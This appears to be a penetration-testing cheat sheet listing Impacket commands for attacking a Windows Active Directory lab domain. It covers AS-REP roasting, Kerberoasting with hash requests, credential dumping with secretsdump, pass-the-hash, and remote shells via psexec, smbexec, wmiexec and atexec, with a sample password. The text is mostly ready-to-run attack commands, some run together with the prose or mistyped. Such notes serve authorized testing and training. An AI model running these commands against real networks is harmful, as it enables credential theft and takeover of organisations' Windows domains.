Impacket
Impacket is a collection of Python libraries and tools designed for working with network protocols, commonly used in penetration testing, red teaming, and post-exploitation. It supports a wide range of protocols such as SMB, TCP, UDP, HTTP, LDAP, and more, allowing users to craft, manipulate, and interact with network packets. Impacket includes tools for tasks like remote command execution, credential dumping, and SMB/NTLM operations, making it particularly useful for interacting with Windows networks. Its scriptable and extensible nature, along with its support for low-level protocol manipulation, makes Impacket a powerful tool for security professionals.
ASREP Roasting : Unprivileged accounts on the windows domain
impacket GetNPUsers.py GHOUL.com/ -dc-ip 192.168.0.10 -no-pass -usersfile /users.txtGetting User account hashes with compromised SPN user on the AD
impacket GETUSERSPNs.py GHOUL.com/ghoul:"Hang@123" -dc-ip 192.168.0.10This will list the other SPN users on the windows AD and to get their hashes we will dump with the following command :
impacket GETUSERSPNs.py GHOUL.com/ghoul:"Hang@123" -dc-ip 192.168.0.10 -requestImpacket psexec
Once we crack the hashes of the priviledged accounts on the AD we will now try to gain the shell of the target machine using :
impacket-psexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10to dump secrets of other users
impacket-secretsdump GHOUL.com/ghoul@"Hang@123"@192.16.0.10after getting the full hash of the active accounts on the AD then we can log into any user accounts via providing hash directly
impacket-psexec GHOUL.com/ghoul@192.168.0.10 -hashes <hash:hash>It is very important to check wheather the same account also exists on the local workgroup which can be known through :
impacket-psexec ghoul:"Hang@123"@192.168.0.10Impacket-smbexec & Impacket-wmiexec
impacket-smbexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10impacket-wmiexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10Impacket-atexec : Directly pass commands on the targeted server
impacket-atexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10 whomaiLookup sid to list potenial users on the targeted domain
impacket-lookupsid GHOUL.com/ghoul:"Hang@123"@192.168.0.10Services execution on the targeted domain
impacket-services GHOUL.com/ghoul:"Hang@123"@192.168.0.10 --helpimpacket-services GHOUL.com/ghoul:"Hang@123"@192.168.0.10 listimpacket-services GHOUL.com/ghoul:"Hang@123"@192.168.0.10 start <service name>
SMBclient over Impacket
impacket-smbclient GHOUL.com/ghoul:"Hang@123"@192.168.0.10for cracking hashes we can crack the hases using hashcat , The detailed overview of hashcat is given below :
HashcatLast updated